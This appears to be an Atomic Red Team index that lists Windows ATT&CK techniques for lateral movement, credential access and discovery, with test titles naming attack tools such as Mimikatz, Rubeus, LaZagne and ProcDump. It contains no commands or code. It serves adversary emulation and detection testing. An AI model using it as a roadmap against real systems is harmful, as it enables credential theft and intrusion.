- T1114.003 Email Collection: Email Forwarding Rule [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1074 Data Staged [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1056.002 Input Capture: GUI Input Capture](../../T1056.002/T1056.002.md)
- Atomic Test #2: PowerShell - Prompt User for Password [windows]
- [T1039 Data from Network Shared Drive](../../T1039/T1039.md)
- Atomic Test #1: Copy a sensitive File over Administrative share with copy [windows]
- Atomic Test #2: Copy a sensitive File over Administrative share with Powershell [windows]
- T1114.002 Remote Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1056 Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1557.002 ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1213 Data from Information Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1056.004 Input Capture: Credential API Hooking](../../T1056.004/T1056.004.md)
- Atomic Test #1: Hook PowerShell TLS Encrypt/Decrypt Messages [windows]
# lateral-movement
- T1021.005 VNC [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1080 Taint Shared Content [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1017 Application Deployment Software [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1091 Replication Through Removable Media](../../T1091/T1091.md)
- Atomic Test #1: USB Malware Spread Simulation [windows]
- [T1021.002 Remote Services: SMB/Windows Admin Shares](../../T1021.002/T1021.002.md)
- Atomic Test #1: Map admin share [windows]
- Atomic Test #2: Map Admin Share PowerShell [windows]
- Atomic Test #3: Copy and Execute File with PsExec [windows]
- Atomic Test #4: Execute command writing output to local Admin Share [windows]
- T1550 Use Alternate Authentication Material [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1076 Remote Desktop Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1021 Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1563 Remote Service Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1021.006 Remote Services: Windows Remote Management](../../T1021.006/T1021.006.md)
- Atomic Test #1: Enable Windows Remote Management [windows]
- Atomic Test #2: Remote Code Execution with PS Credentials Using Invoke-Command [windows]
- Atomic Test #3: WinRM Access with Evil-WinRM [windows]
- [T1021.003 Remote Services: Distributed Component Object Model](../../T1021.003/T1021.003.md)
- Atomic Test #1: PowerShell Lateral Movement using MMC20 [windows]
- T1175 Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1550.003 Use Alternate Authentication Material: Pass the Ticket](../../T1550.003/T1550.003.md)
- Atomic Test #1: Mimikatz Kerberos Ticket Attack [windows]
- Atomic Test #2: Rubeus Kerberos Pass The Ticket [windows]
- T1051 Shared Webroot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1072 Software Deployment Tools](../../T1072/T1072.md)
- Atomic Test #1: Radmin Viewer Utility [windows]
- Atomic Test #2: PDQ Deploy RAT [windows]
- T1210 Exploitation of Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1534 Internal Spearphishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1097 Pass the Ticket [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1570 Lateral Tool Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1075 Pass the Hash [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1028 Windows Remote Management [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1563.002 Remote Service Session Hijacking: RDP Hijacking](../../T1563.002/T1563.002.md)
- Atomic Test #1: RDP hijacking [windows]
- [T1550.002 Use Alternate Authentication Material: Pass the Hash](../../T1550.002/T1550.002.md)
- Atomic Test #1: Mimikatz Pass the Hash [windows]
- Atomic Test #2: crackmapexec Pass the Hash [windows]
- Atomic Test #3: Invoke-WMIExec Pass the Hash [windows]
- [T1021.001 Remote Services: Remote Desktop Protocol](../../T1021.001/T1021.001.md)
- Atomic Test #1: RDP to DomainController [windows]
- Atomic Test #2: Changing RDP Port to Non Standard Port via Powershell [windows]
- Atomic Test #3: Changing RDP Port to Non Standard Port via Command_Prompt [windows]
- T1077 Windows Admin Shares [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# credential-access
- T1557 Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1056.001 Input Capture: Keylogging](../../T1056.001/T1056.001.md)
- Atomic Test #1: Input Capture [windows]
- [T1110.001 Brute Force: Password Guessing](../../T1110.001/T1110.001.md)
- Atomic Test #1: Brute Force Credentials of single Active Directory domain users via SMB [windows]
- Atomic Test #2: Brute Force Credentials of single Active Directory domain user via LDAP against domain controller (NTLM or Kerberos) [windows]
- Atomic Test #4: Password Brute User using Kerbrute Tool [windows]
- [T1003 OS Credential Dumping](../../T1003/T1003.md)
- Atomic Test #1: Gsecdump [windows]
- Atomic Test #2: Credential Dumping with NPPSpy [windows]
- Atomic Test #3: Dump svchost.exe to gather RDP credentials [windows]
- Atomic Test #4: Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using list) [windows]
- Atomic Test #5: Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using config) [windows]
- Atomic Test #6: Dump Credential Manager using keymgr.dll and rundll32.exe [windows]
- T1171 LLMNR/NBT-NS Poisoning and Relay [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1539 Steal Web Session Cookie](../../T1539/T1539.md)
- Atomic Test #1: Steal Firefox Cookies (Windows) [windows]
- Atomic Test #2: Steal Chrome Cookies (Windows) [windows]
- [T1003.002 OS Credential Dumping: Security Account Manager](../../T1003.002/T1003.002.md)
- Atomic Test #1: Registry dump of SAM, creds, and secrets [windows]
- Atomic Test #2: Registry parse with pypykatz [windows]
- Atomic Test #3: esentutl.exe SAM copy [windows]
- Atomic Test #4: PowerDump Hashes and Usernames from Registry [windows]
- Atomic Test #5: dump volume shadow copy hives with certutil [windows]
- Atomic Test #6: dump volume shadow copy hives with System.IO.File [windows]
- Atomic Test #7: WinPwn - Loot local Credentials - Dump SAM-File for NTLM Hashes [windows]
- [T1110.002 Brute Force: Password Cracking](../../T1110.002/T1110.002.md)
- Atomic Test #1: Password Cracking with Hashcat [windows]
- [T1003.004 OS Credential Dumping: LSA Secrets](../../T1003.004/T1003.004.md)
- Atomic Test #1: Dumping LSA Secrets [windows]
- T1606.002 Forge Web Credentials: SAML token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1214 Credentials in Registry [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1555.005 Password Managers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1040 Network Sniffing](../../T1040/T1040.md)
- Atomic Test #3: Packet Capture Windows Command Prompt [windows]
- Atomic Test #4: Windows Internal Packet Capture [windows]
- Atomic Test #5: Windows Internal pktmon capture [windows]
- Atomic Test #6: Windows Internal pktmon set filter [windows]
- [T1552.002 Unsecured Credentials: Credentials in Registry](../../T1552.002/T1552.002.md)
- Atomic Test #1: Enumeration for Credentials in Registry [windows]
- Atomic Test #2: Enumeration for PuTTY Credentials in Registry [windows]
- [T1556.002 Modify Authentication Process: Password Filter DLL](../../T1556.002/T1556.002.md)
- Atomic Test #1: Install and Register Password Filter DLL [windows]
- [T1558.004 Steal or Forge Kerberos Tickets: AS-REP Roasting](../../T1558.004/T1558.004.md)
- Atomic Test #1: Rubeus asreproast [windows]
- Atomic Test #2: Get-DomainUser with PowerView [windows]
- Atomic Test #3: WinPwn - PowerSharpPack - Kerberoasting Using Rubeus [windows]
- T1558 Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1555 Credentials from Password Stores](../../T1555/T1555.md)
- Atomic Test #1: Extract Windows Credential Manager via VBA [windows]
- Atomic Test #2: Dump credentials from Windows Credential Manager With PowerShell [windows Credentials] [windows]
- Atomic Test #3: Dump credentials from Windows Credential Manager With PowerShell [web Credentials] [windows]
- Atomic Test #4: Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Windows Credentials] [windows]
- Atomic Test #5: Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Web Credentials] [windows]
- Atomic Test #6: WinPwn - Loot local Credentials - lazagne [windows]
- Atomic Test #7: WinPwn - Loot local Credentials - Wifi Credentials [windows]
- Atomic Test #8: WinPwn - Loot local Credentials - Decrypt Teamviewer Passwords [windows]
- T1552 Unsecured Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1503 Credentials from Web Browsers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.007 Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1145 Private Keys [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1555.003 Credentials from Password Stores: Credentials from Web Browsers](../../T1555.003/T1555.003.md)
- Atomic Test #1: Run Chrome-password Collector [windows]
- Atomic Test #3: LaZagne - Credentials from Browser [windows]
- Atomic Test #4: Simulating access to Chrome Login Data [windows]
- Atomic Test #5: Simulating access to Opera Login Data [windows]
- Atomic Test #6: Simulating access to Windows Firefox Login Data [windows]
- Atomic Test #7: Simulating access to Windows Edge Login Data [windows]
- Atomic Test #8: Decrypt Mozilla Passwords with Firepwd.py [windows]
- Atomic Test #10: Stage Popular Credential Files for Exfiltration [windows]
- Atomic Test #11: WinPwn - BrowserPwn [windows]
- Atomic Test #12: WinPwn - Loot local Credentials - mimi-kittenz [windows]
- Atomic Test #13: WinPwn - PowerSharpPack - Sharpweb for Browser Credentials [windows]
- Atomic Test #15: WebBrowserPassView - Credentials from Browser [windows]
- Atomic Test #16: BrowserStealer (Chrome / Firefox / Microsoft Edge) [windows]
- T1557.003 DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1552.004 Unsecured Credentials: Private Keys](../../T1552.004/T1552.004.md)
- Atomic Test #1: Private Keys [windows]
- Atomic Test #6: ADFS token signing and encryption certificates theft - Local [windows]
- Atomic Test #7: ADFS token signing and encryption certificates theft - Remote [windows]
- Atomic Test #8: CertUtil ExportPFX [windows]
- Atomic Test #9: Export Root Certificate with Export-PFXCertificate [windows]
- Atomic Test #10: Export Root Certificate with Export-Certificate [windows]
- Atomic Test #11: Export Certificates with Mimikatz [windows]
- [T1557.001 Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay](../../T1557.001/T1557.001.md)
- Atomic Test #1: LLMNR Poisoning with Inveigh (PowerShell) [windows]
- [T1003.001 OS Credential Dumping: LSASS Memory](../../T1003.001/T1003.001.md)
- Atomic Test #1: Dump LSASS.exe Memory using ProcDump [windows]
- Atomic Test #2: Dump LSASS.exe Memory using comsvcs.dll [windows]
- Atomic Test #3: Dump LSASS.exe Memory using direct system calls and API unhooking [windows]
- Atomic Test #4: Dump LSASS.exe Memory using NanoDump [windows]
- Atomic Test #5: Dump LSASS.exe Memory using Windows Task Manager [windows]
- Atomic Test #6: Offline Credential Theft With Mimikatz [windows]
- Atomic Test #7: LSASS read with pypykatz [windows]
- Atomic Test #8: Dump LSASS.exe Memory using Out-Minidump.ps1 [windows]
- Atomic Test #9: Create Mini Dump of LSASS.exe using ProcDump [windows]
- Atomic Test #10: Powershell Mimikatz [windows]
- Atomic Test #11: Dump LSASS with createdump.exe from .Net v5 [windows]
- Atomic Test #12: Dump LSASS.exe using imported Microsoft DLLs [windows]
- T1179 Hooking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1110.003 Brute Force: Password Spraying](../../T1110.003/T1110.003.md)
- Atomic Test #1: Password Spray all Domain Users [windows]
- Atomic Test #2: Password Spray (DomainPasswordSpray) [windows]
- Atomic Test #3: Password spray all Active Directory domain users with a single password via LDAP against domain controller (NTLM or Kerberos) [windows]
- Atomic Test #5: WinPwn - DomainPasswordSpray Attacks [windows]
- Atomic Test #6: Password Spray Invoke-DomainPasswordSpray Light [windows]
- Atomic Test #8: Password Spray using Kerbrute Tool [windows]
- T1056.003 Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1003.005 OS Credential Dumping: Cached Domain Credentials](../../T1003.005/T1003.005.md)
- Atomic Test #1: Cached Credential Dump via Cmdkey [windows]
- [T1558.001 Steal or Forge Kerberos Tickets: Golden Ticket](../../T1558.001/T1558.001.md)
- Atomic Test #1: Crafting Active Directory golden tickets with mimikatz [windows]
- Atomic Test #2: Crafting Active Directory golden tickets with Rubeus [windows]
- [T1649 Steal or Forge Authentication Certificates](../../T1649/T1649.md)
- Atomic Test #1: Staging Local Certificates via Export-Certificate [windows]
- [T1552.001 Unsecured Credentials: Credentials In Files](../../T1552.001/T1552.001.md)
- Atomic Test #4: Extracting passwords with findstr [windows]
- Atomic Test #5: Access unattend.xml [windows]
- Atomic Test #7: WinPwn - sensitivefiles [windows]
- Atomic Test #8: WinPwn - Snaffler [windows]
- Atomic Test #9: WinPwn - powershellsensitive [windows]
- Atomic Test #10: WinPwn - passhunt [windows]
- Atomic Test #11: WinPwn - SessionGopher [windows]
- Atomic Test #12: WinPwn - Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials [windows]
- T1606.001 Web Cookies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1552.006 Unsecured Credentials: Group Policy Preferences](../../T1552.006/T1552.006.md)
- Atomic Test #1: GPP Passwords (findstr) [windows]
- Atomic Test #2: GPP Passwords (Get-GPPPassword) [windows]
- T1556.008 Network Provider DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1141 Input Prompt [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1606 Forge Web Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1621 Multi-Factor Authentication Request Generation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1212 Exploitation for Credential Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1056.002 Input Capture: GUI Input Capture](../../T1056.002/T1056.002.md)
- Atomic Test #2: PowerShell - Prompt User for Password [windows]
- T1110 Brute Force [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1110.004 Brute Force: Credential Stuffing](../../T1110.004/T1110.004.md)
- Atomic Test #3: Brute Force:Credential Stuffing using Kerbrute Tool [windows]
- T1208 Kerberoasting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.006 Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1187 Forced Authentication](../../T1187/T1187.md)
- Atomic Test #1: PetitPotam [windows]
- Atomic Test #2: WinPwn - PowerSharpPack - Retrieving NTLM Hashes without Touching LSASS [windows]
- T1174 Password Filter DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1081 Credentials in Files [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1056 Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1557.002 ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1558.002 Steal or Forge Kerberos Tickets: Silver Ticket](../../T1558.002/T1558.002.md)
- Atomic Test #1: Crafting Active Directory silver tickets with mimikatz [windows]
- [T1555.004 Credentials from Password Stores: Windows Credential Manager](../../T1555.004/T1555.004.md)
- Atomic Test #1: Access Saved Credentials via VaultCmd [windows]
- Atomic Test #2: WinPwn - Loot local Credentials - Invoke-WCMDump [windows]
- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.005 Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1111 Multi-Factor Authentication Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1003.003 OS Credential Dumping: NTDS](../../T1003.003/T1003.003.md)
- Atomic Test #1: Create Volume Shadow Copy with vssadmin [windows]
- Atomic Test #2: Copy NTDS.dit from Volume Shadow Copy [windows]
- Atomic Test #3: Dump Active Directory Database with NTDSUtil [windows]
- Atomic Test #4: Create Volume Shadow Copy with WMI [windows]
- Atomic Test #5: Create Volume Shadow Copy remotely with WMI [windows]
- Atomic Test #6: Create Volume Shadow Copy remotely (WMI) with esentutl [windows]
- Atomic Test #7: Create Volume Shadow Copy with Powershell [windows]
- Atomic Test #8: Create Symlink to Volume Shadow Copy [windows]
- [T1558.003 Steal or Forge Kerberos Tickets: Kerberoasting](../../T1558.003/T1558.003.md)
- Atomic Test #1: Request for service tickets [windows]
- Atomic Test #2: Rubeus kerberoast [windows]
- Atomic Test #3: Extract all accounts in use as SPN using setspn [windows]
- Atomic Test #4: Request A Single Ticket via PowerShell [windows]
- Atomic Test #5: Request All Tickets via PowerShell [windows]
- Atomic Test #6: WinPwn - Kerberoasting [windows]
- Atomic Test #7: WinPwn - PowerSharpPack - Kerberoasting Using Rubeus [windows]
- [T1003.006 OS Credential Dumping: DCSync](../../T1003.006/T1003.006.md)
- Atomic Test #1: DCSync (Active Directory) [windows]
- Atomic Test #2: Run DSInternals Get-ADReplAccount [windows]
- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1056.004 Input Capture: Credential API Hooking](../../T1056.004/T1056.004.md)
- Atomic Test #1: Hook PowerShell TLS Encrypt/Decrypt Messages [windows]
# discovery
- [T1033 System Owner/User Discovery](../../T1033/T1033.md)
- Atomic Test #1: System Owner/User Discovery [windows]
- Atomic Test #3: Find computers where user has session - Stealth mode (PowerView) [windows]
- Atomic Test #4: User Discovery With Env Vars PowerShell Script [windows]
- Atomic Test #5: GetCurrent User with PowerShell Script [windows]
- Atomic Test #6: System Discovery - SocGholish whoami [windows]
- T1016.001 Internet Connection Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1069 Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1615 Group Policy Discovery](../../T1615/T1615.md)
- Atomic Test #1: Display group policy information via gpresult [windows]
- Atomic Test #2: Get-DomainGPO to display group policy information via PowerView [windows]
- Atomic Test #3: WinPwn - GPOAudit [windows]
- Atomic Test #4: WinPwn - GPORemoteAccessPolicy [windows]
- Atomic Test #5: MSFT Get-GPO Cmdlet [windows]
- T1652 Device Driver Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1087.002 Account Discovery: Domain Account](../../T1087.002/T1087.002.md)
- Atomic Test #1: Enumerate all accounts (Domain) [windows]
- Atomic Test #2: Enumerate all accounts via PowerShell (Domain) [windows]
- Atomic Test #3: Enumerate logged on users via CMD (Domain) [windows]
- Atomic Test #4: Automated AD Recon (ADRecon) [windows]
- Atomic Test #5: Adfind -Listing password policy [windows]
- Atomic Test #6: Adfind - Enumerate Active Directory Admins [windows]
- Atomic Test #7: Adfind - Enumerate Active Directory User Objects [windows]
- Atomic Test #8: Adfind - Enumerate Active Directory Exchange AD Objects [windows]
- Atomic Test #9: Enumerate Default Domain Admin Details (Domain) [windows]
- Atomic Test #10: Enumerate Active Directory for Unconstrained Delegation [windows]
- Atomic Test #11: Get-DomainUser with PowerView [windows]
- Atomic Test #12: Enumerate Active Directory Users with ADSISearcher [windows]
- Atomic Test #13: Enumerate Linked Policies In ADSISearcher Discovery [windows]
- Atomic Test #14: Enumerate Root Domain linked policies Discovery [windows]
- Atomic Test #15: WinPwn - generaldomaininfo [windows]
- Atomic Test #16: Kerbrute - userenum [windows]
- Atomic Test #17: Wevtutil - Discover NTLM Users Remote [windows]
- Atomic Test #18: Suspicious LAPS Attributes Query with Get-ADComputer all properties [windows]
- Atomic Test #19: Suspicious LAPS Attributes Query with Get-ADComputer ms-Mcs-AdmPwd property [windows]
- Atomic Test #20: Suspicious LAPS Attributes Query with Get-ADComputer all properties and SearchScope [windows]
- Atomic Test #21: Suspicious LAPS Attributes Query with adfind all properties [windows]
- Atomic Test #22: Suspicious LAPS Attributes Query with adfind ms-Mcs-AdmPwd [windows]
- T1063 Security Software Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1087.001 Account Discovery: Local Account](../../T1087.001/T1087.001.md)
- Atomic Test #8: Enumerate all accounts on Windows (Local) [windows]
- Atomic Test #9: Enumerate all accounts via PowerShell (Local) [windows]
- Atomic Test #10: Enumerate logged on users via CMD (Local) [windows]
- [T1497.001 Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md)
- Atomic Test #2: Detect Virtualization Environment (Windows) [windows]
- Atomic Test #4: Detect Virtualization Environment via WMI Manufacturer/Model Listing (Windows) [windows]
- [T1069.002 Permission Groups Discovery: Domain Groups](../../T1069.002/T1069.002.md)
- Atomic Test #1: Basic Permission Groups Discovery Windows (Domain) [windows]
- Atomic Test #2: Permission Groups Discovery PowerShell (Domain) [windows]
- Atomic Test #3: Elevated group enumeration using net group (Domain) [windows]
- Atomic Test #4: Find machines where user has local admin access (PowerView) [windows]
- Atomic Test #5: Find local admins on all machines in domain (PowerView) [windows]
- Atomic Test #6: Find Local Admins via Group Policy (PowerView) [windows]
- Atomic Test #7: Enumerate Users Not Requiring Pre Auth (ASRepRoast) [windows]
- Atomic Test #8: Adfind - Query Active Directory Groups [windows]
- Atomic Test #9: Enumerate Active Directory Groups with Get-AdGroup [windows]
- Atomic Test #10: Enumerate Active Directory Groups with ADSISearcher [windows]
- Atomic Test #11: Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting) [windows]
- Atomic Test #12: Get-DomainGroupMember with PowerView [windows]
- Atomic Test #13: Get-DomainGroup with PowerView [windows]
- Atomic Test #14: Active Directory Enumeration with LDIFDE [windows]
- [T1007 System Service Discovery](../../T1007/T1007.md)
- Atomic Test #1: System Service Discovery [windows]
- Atomic Test #2: System Service Discovery - net.exe [windows]
- [T1040 Network Sniffing](../../T1040/T1040.md)
- Atomic Test #3: Packet Capture Windows Command Prompt [windows]
- Atomic Test #4: Windows Internal Packet Capture [windows]
- Atomic Test #5: Windows Internal pktmon capture [windows]
- Atomic Test #6: Windows Internal pktmon set filter [windows]
- [T1135 Network Share Discovery](../../T1135/T1135.md)
- Atomic Test #3: Network Share Discovery command prompt [windows]
- Atomic Test #4: Network Share Discovery PowerShell [windows]
- Atomic Test #5: View available share drives [windows]
- Atomic Test #6: Share Discovery with PowerView [windows]
- Atomic Test #7: PowerView ShareFinder [windows]
- Atomic Test #8: WinPwn - shareenumeration [windows]
- Atomic Test #9: Network Share Discovery via dir command [windows]
- [T1120 Peripheral Device Discovery](../../T1120/T1120.md)
- Atomic Test #1: Win32_PnPEntity Hardware Inventory [windows]
- Atomic Test #2: WinPwn - printercheck [windows]
- [T1082 System Information Discovery](../../T1082/T1082.md)
- Atomic Test #1: System Information Discovery [windows]
- Atomic Test #6: Hostname Discovery (Windows) [windows]
- Atomic Test #8: Windows MachineGUID Discovery [windows]
- Atomic Test #9: Griffon Recon [windows]
- Atomic Test #10: Environment variables discovery on windows [windows]
- Atomic Test #13: WinPwn - winPEAS [windows]
- Atomic Test #14: WinPwn - itm4nprivesc [windows]
- Atomic Test #15: WinPwn - Powersploits privesc checks [windows]
- Atomic Test #16: WinPwn - General privesc checks [windows]
- Atomic Test #17: WinPwn - GeneralRecon [windows]
- Atomic Test #18: WinPwn - Morerecon [windows]
- Atomic Test #19: WinPwn - RBCD-Check [windows]
- Atomic Test #20: WinPwn - PowerSharpPack - Watson searching for missing windows patches [windows]
- Atomic Test #21: WinPwn - PowerSharpPack - Sharpup checking common Privesc vectors [windows]
- Atomic Test #22: WinPwn - PowerSharpPack - Seatbelt [windows]
- Atomic Test #25: System Information Discovery with WMIC [windows]
- [T1010 Application Window Discovery](../../T1010/T1010.md)
- Atomic Test #1: List Process Main Windows - C# .NET [windows]
- T1087.003 Email Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1497.003 Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1217 Browser Bookmark Discovery](../../T1217/T1217.md)
- Atomic Test #4: List Google Chrome / Opera Bookmarks on Windows with powershell [windows]
- Atomic Test #5: List Google Chrome / Edge Chromium Bookmarks on Windows with command prompt [windows]
- Atomic Test #6: List Mozilla Firefox bookmarks on Windows with command prompt [windows]
- Atomic Test #7: List Internet Explorer Bookmarks using the command prompt [windows]
- [T1016 System Network Configuration Discovery](../../T1016/T1016.md)
- Atomic Test #1: System Network Configuration Discovery on Windows [windows]
- Atomic Test #2: List Windows Firewall Rules [windows]
- Atomic Test #4: System Network Configuration Discovery (TrickBot Style) [windows]
- Atomic Test #5: List Open Egress Ports [windows]
- Atomic Test #6: Adfind - Enumerate Active Directory Subnet Objects [windows]
- Atomic Test #7: Qakbot Recon [windows]
- Atomic Test #9: DNS Server Discovery Using nslookup [windows]
- T1087 Account Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1482 Domain Trust Discovery](../../T1482/T1482.md)
- Atomic Test #1: Windows - Discover domain trusts with dsquery [windows]
- Atomic Test #2: Windows - Discover domain trusts with nltest [windows]
- Atomic Test #3: Powershell enumerate domains and forests [windows]
- Atomic Test #4: Adfind - Enumerate Active Directory OUs [windows]
- Atomic Test #5: Adfind - Enumerate Active Directory Trusts [windows]
- Atomic Test #6: Get-DomainTrust with PowerView [windows]
- Atomic Test #7: Get-ForestTrust with PowerView [windows]
- Atomic Test #8: TruffleSnout - Listing AD Infrastructure [windows]
- [T1083 File and Directory Discovery](../../T1083/T1083.md)
- Atomic Test #1: File and Directory Discovery (cmd.exe) [windows]
- Atomic Test #2: File and Directory Discovery (PowerShell) [windows]
- Atomic Test #5: Simulating MAZE Directory Enumeration [windows]
- Atomic Test #6: Launch DirLister Executable [windows]
- [T1049 System Network Connections Discovery](../../T1049/T1049.md)
- Atomic Test #1: System Network Connections Discovery [windows]
- Atomic Test #2: System Network Connections Discovery with PowerShell [windows]
- Atomic Test #4: System Discovery using SharpView [windows]
- T1497 Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1057 Process Discovery](../../T1057/T1057.md)
- Atomic Test #2: Process Discovery - tasklist [windows]
- Atomic Test #3: Process Discovery - Get-Process [windows]
- Atomic Test #4: Process Discovery - get-wmiObject [windows]
- Atomic Test #5: Process Discovery - wmic process [windows]
- Atomic Test #6: Discover Specific Process - tasklist [windows]
- T1497.002 User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1069.001 Permission Groups Discovery: Local Groups](../../T1069.001/T1069.001.md)
- Atomic Test #2: Basic Permission Groups Discovery Windows (Local) [windows]
- Atomic Test #3: Permission Groups Discovery PowerShell (Local) [windows]
- Atomic Test #4: SharpHound3 - LocalAdmin [windows]
- Atomic Test #5: Wmic Group Discovery [windows]
- Atomic Test #6: WMIObject Group Discovery [windows]
- [T1201 Password Policy Discovery](../../T1201/T1201.md)
- Atomic Test #5: Examine local password policy - Windows [windows]
- Atomic Test #6: Examine domain password policy - Windows [windows]
- Atomic Test #8: Get-DomainPolicy with PowerView [windows]
- Atomic Test #9: Enumerate Active Directory Password Policy with get-addefaultdomainpasswordpolicy [windows]
- Atomic Test #10: Use of SecEdit.exe to export the local security policy (including the password policy) [windows]
- [T1614.001 System Location Discovery: System Language Discovery](../../T1614.001/T1614.001.md)
- Atomic Test #1: Discover System Language by Registry Query [windows]
- Atomic Test #2: Discover System Language with chcp [windows]
- [T1012 Query Registry](../../T1012/T1012.md)
- Atomic Test #1: Query Registry [windows]
- Atomic Test #2: Query Registry with Powershell cmdlets [windows]
- Atomic Test #3: Enumerate COM Objects in Registry with Powershell [windows]
- T1614 System Location Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1518.001 Software Discovery: Security Software Discovery](../../T1518.001/T1518.001.md)
- Atomic Test #1: Security Software Discovery [windows]
